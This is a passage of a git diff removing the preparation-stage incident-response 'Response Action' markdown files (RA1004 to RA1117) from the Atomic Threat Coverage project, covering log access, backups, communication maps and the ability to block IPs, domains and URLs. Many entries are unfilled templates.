--- a/Atomic_Threat_Coverage/Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Make personnel report suspicious activity         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1004            |
-| **Description**             | Make sure that personnel will report suspicious activity i.e. suspicious emails,  links, files, activity on their computers, etc   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-
-### Workflow
-
-Develop a simplified, company wide-known way to contact IR team in case of suspicious activity on the user system.  
-Make sure that the personnel is aware of it, can and will use it.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1005_set_up_relevant_data_collection.md b/Atomic_Threat_Coverage/Response_Actions/RA_1005_set_up_relevant_data_collection.md
deleted file mode 100644
index 2c4bab6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1005_set_up_relevant_data_collection.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Set up relevant data collection         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1005            |
-| **Description**             | Usually, data collection is managed by Log Management/Security Monitoring/Threat Detection teams.  You need to provide them with a list of data that is critically important for IR process. Most of  the time, data like DNS and DHCP logs are not being collected, as their value for detection is  relatively low. You can refer to the existing Response Actions (Preparation stage) to develop the list   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md b/Atomic_Threat_Coverage/Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md
deleted file mode 100644
index cbfacb7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Set up a centralized long-term log storage         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1006            |
-| **Description**             | Set up a centralized long-term log storage. This is one of the most critical problems companies have nowadays. Even if there is such a system, in most of the cases it stores irrelevant data or has too small retention period   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1007_develop_communication_map.md b/Atomic_Threat_Coverage/Response_Actions/RA_1007_develop_communication_map.md
deleted file mode 100644
index bb986d3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1007_develop_communication_map.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Develop communication map         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1007            |
-| **Description**             | Develop a communication map for both internal (C-level, managers and technical specialists from the other departments, that could be involved in IR process) and external communications (law enforcement, national CERTs, subject matter experts that you have lack of, etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1008_make_sure_there_are_backups.md b/Atomic_Threat_Coverage/Response_Actions/RA_1008_make_sure_there_are_backups.md
deleted file mode 100644
index c8f6b78..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1008_make_sure_there_are_backups.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Make sure there are backups         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1008            |
-| **Description**             | Make sure there are both online and offline backups. Make sure they are fully operational. In the case of a successful ransomware worm attack, thats the only thing that will help you to safe your critically important data   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1009_get_network_architecture_map.md b/Atomic_Threat_Coverage/Response_Actions/RA_1009_get_network_architecture_map.md
deleted file mode 100644
index 0f320e3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1009_get_network_architecture_map.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get network architecture map         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1009            |
-| **Description**             | Get network architecture map. Usually, its managed by the Network security team. It will help you to choose the containment strategy, such as isolating specific network segments   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1010_get_access_control_matrix.md b/Atomic_Threat_Coverage/Response_Actions/RA_1010_get_access_control_matrix.md
deleted file mode 100644
index 4cf49b7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1010_get_access_control_matrix.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get access control matrix         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1010            |
-| **Description**             | Get Access Control Matrix. Usually, its managed by the Network security team. It will help you to identify adversary opportunities, such as laterally movement and so on   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1011_develop_assets_knowledge_base.md b/Atomic_Threat_Coverage/Response_Actions/RA_1011_develop_assets_knowledge_base.md
deleted file mode 100644
index 3c22d91..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1011_develop_assets_knowledge_base.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Develop assets knowledge base         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1011            |
-| **Description**             | Develop assets knowledge base. It will help you to compare observed activity with a normal activity profile for a specific host, user or network segment   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1012_check_analysis_toolset.md b/Atomic_Threat_Coverage/Response_Actions/RA_1012_check_analysis_toolset.md
deleted file mode 100644
index 30aae47..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1012_check_analysis_toolset.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Check analysis toolset         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1012            |
-| **Description**             | Make sure your toolset for analysis and management is updated and fully operational. Make sure that all the required permissions have been granted as well   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1013_access_vulnerability_management_system_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1013_access_vulnerability_management_system_logs.md
deleted file mode 100644
index 750c20c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1013_access_vulnerability_management_system_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access vulnerability management system logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1013            |
-| **Description**             | Access vulnerability management system logs. It will help to identify the vulnerabilities a specific host had at a specific time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1014_connect_with_trusted_communities.md b/Atomic_Threat_Coverage/Response_Actions/RA_1014_connect_with_trusted_communities.md
deleted file mode 100644
index 2efce2a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1014_connect_with_trusted_communities.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Connect with trusted communities         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1014            |
-| **Description**             | Connect with trusted communities for information exchange   |
-| **Author**                  | Andreas Hunkeler (@Karneades)        |
-| **Creation Date**           | 14.05.2020 |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://www.misp-project.org/](https://www.misp-project.org/)</li></ul>|
-| **Requirements** |<ul><li>MISP connection to other teams or working on the MISP instance of another institution</li><li>Mailing list</li><li>Slack channel</li></ul>|
-
-### Workflow
-
-Contact other companies or information providers for getting on a ML or get connected to other MISP instances.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1101_access_external_network_flow_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1101_access_external_network_flow_logs.md
deleted file mode 100644
index a6fed80..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1101_access_external_network_flow_logs.md
+++ /dev/null
@@ -1,19 +0,0 @@
-| Title                       | Access external network flow logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1101            |
-| **Description**             | Make sure you have access to external communication Network Flow logs   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://en.wikipedia.org/wiki/NetFlow](https://en.wikipedia.org/wiki/NetFlow)</li><li>[https://www.plixer.com/blog/how-accurate-is-sampled-netflow/](https://www.plixer.com/blog/how-accurate-is-sampled-netflow/)</li></ul>|
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_ngfw</li><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Make sure that there is a collection of Network Flow logs for external communication (from corporate assets to the Internet) configured.  
-If there is no option to configure it on a network device, you can install a special software on each endpoint and collect it from them.  
-
-Warning:  
-
-- There is a feature called ["NetFlow Sampling"](https://www.plixer.com/blog/how-accurate-is-sampled-netflow/), that eliminates the value of the Network Flow logs for some of the tasks, such as "check if some host communicated to an external IP". Make sure it's disabled or you have an alternative way to collect Network Flow logs  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1102_access_internal_network_flow_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1102_access_internal_network_flow_logs.md
deleted file mode 100644
index c53bd5a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1102_access_internal_network_flow_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access internal network flow logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1102            |
-| **Description**             | Make sure you have access to internal communication Network Flow logs   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1103_access_internal_http_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1103_access_internal_http_logs.md
deleted file mode 100644
index d7a11ff..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1103_access_internal_http_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access internal HTTP logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1103            |
-| **Description**             | Make sure you have access to internal communication HTTP logs   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_http_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1104_access_external_http_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1104_access_external_http_logs.md
deleted file mode 100644
index 3f87791..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1104_access_external_http_logs.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Access external HTTP logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1104            |
-| **Description**             | Make sure you have access to external communication HTTP logs   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://docs.zeek.org/en/current/examples/httpmonitor/](https://docs.zeek.org/en/current/examples/httpmonitor/)</li><li>[https://en.wikipedia.org/wiki/Common_Log_Format](https://en.wikipedia.org/wiki/Common_Log_Format)</li></ul>|
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ngfw</li><li>DN_zeek_http_log</li></ul>|
-
-### Workflow
-
-Make sure that there is a collection of HTTP connections logs for external communication (from corporate assets to the Internet) configured.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1105_access_internal_dns_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1105_access_internal_dns_logs.md
deleted file mode 100644
index 86b0640..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1105_access_internal_dns_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access internal DNS logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1105            |
-| **Description**             | Make sure you have access to internal communication DNS logs   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_dns_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1106_access_external_dns_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1106_access_external_dns_logs.md
deleted file mode 100644
index c1045a3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1106_access_external_dns_logs.md
+++ /dev/null
@@ -1,20 +0,0 @@
-| Title                       | Access external DNS logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1106            |
-| **Description**             | Make sure you have access to external communication DNS logs   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://github.com/gamelinux/passivedns](https://github.com/gamelinux/passivedns)</li><li>[https://drive.google.com/drive/u/0/folders/0B5BuM3k0_mF3LXpnYVUtU091Vjg](https://drive.google.com/drive/u/0/folders/0B5BuM3k0_mF3LXpnYVUtU091Vjg)</li></ul>|
-| **Requirements** |<ul><li>MS_dns_server</li><li>DN_zeek_dns_log</li></ul>|
-
-### Workflow
-
-Make sure that there is a collection of DNS logs for external communication (from corporate assets to the Internet) configured.  
-If there is no option to configure it on a network device/DNS Server, you can install a special software on each endpoint and collect it from them.  
-
-Warning:  
-
-- Make sure that there are both DNS query and answer logs collected. It's quite hard to configure such a collection on MS Windows DNS server and ISC BIND. Sometimes it much easier to use 3rd party solutions to fulfill this requirement.  
-- Make sure that DNS traffic to the external (public) DNS servers is blocked by the Border Firewall. This way, corporate DNS servers is the only place assets can resolve the domain names.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1107_access_vpn_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1107_access_vpn_logs.md
deleted file mode 100644
index ed40cff..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1107_access_vpn_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access VPN logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1107            |
-| **Description**             | Make sure you have access to VPN logs   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1108_access_dhcp_logs.md b/Atomic_Threat_Coverage/Response_Actions/RA_1108_access_dhcp_logs.md
deleted file mode 100644
index 34b2da5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1108_access_dhcp_logs.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access DHCP logs         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1108            |
-| **Description**             | Make sure you have access to DHCP logs   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1109_access_internal_packet_capture_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_1109_access_internal_packet_capture_data.md
deleted file mode 100644
index 2a52eee..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1109_access_internal_packet_capture_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access internal packet capture data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1109            |
-| **Description**             | Make sure you have access to internal communication Packet Capture data   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_PCAP</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1110_access_external_packet_capture_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_1110_access_external_packet_capture_data.md
deleted file mode 100644
index 9a898b7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1110_access_external_packet_capture_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Access external packet capture data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1110            |
-| **Description**             | Make sure you have access to external communication Packet Capture data   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_PCAP</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md b/Atomic_Threat_Coverage/Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md
deleted file mode 100644
index bfd32cd..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title                       | Get ability to block external IP address         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1111            |
-| **Description**             | Make sure you have the ability to block an external IP address from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to create a policy rule in one of the listed Mitigation Systems that will you to block an external IP address from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external IP address from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md b/Atomic_Threat_Coverage/Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md
deleted file mode 100644
index 07dc3de..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block internal IP address         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1112            |
-| **Description**             | Make sure you can block an internal IP address from being accessed by corporate assets   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_firewall</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1113_get_ability_to_block_external_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_1113_get_ability_to_block_external_domain.md
deleted file mode 100644
index 2f6d9aa..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1113_get_ability_to_block_external_domain.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title                       | Get ability to block external domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1113            |
-| **Description**             | Make sure you have the ability to block an external domain name from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://en.wikipedia.org/wiki/DNS_sinkhole](https://en.wikipedia.org/wiki/DNS_sinkhole)</li></ul>|
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to create a policy rule or a specific configuration in one of the listed Mitigation Systems that will you to block an external domain name from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external domain name from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1114_get_ability_to_block_internal_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_1114_get_ability_to_block_internal_domain.md
deleted file mode 100644
index 9b163b1..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1114_get_ability_to_block_internal_domain.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block internal domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1114            |
-| **Description**             | Make sure you can block an internal domain name from being accessed by corporate assets   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1115_get_ability_to_block_external_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_1115_get_ability_to_block_external_url.md
deleted file mode 100644
index a92c05e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1115_get_ability_to_block_external_url.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title                       | Get ability to block external URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1115            |
-| **Description**             | Make sure you have the ability to block an external URL from being accessed by corporate assets   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://wiki.squid-cache.org/SquidFaq/SquidAcl](https://wiki.squid-cache.org/SquidFaq/SquidAcl)</li></ul>|
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to create a policy rule or a specific configuration in one of the listed Mitigation Systems that will you to block an external URL from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external URL from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1116_get_ability_to_block_internal_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_1116_get_ability_to_block_internal_url.md
deleted file mode 100644
index 3fa9e4b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1116_get_ability_to_block_internal_url.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block internal URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1116            |
-| **Description**             | Make sure you can block an internal URL from being accessed by corporate assets   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md
deleted file mode 100644
index 49cca1e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block port external communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1117            |
-| **Description**             | Make sure you can block a network port for external communications   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
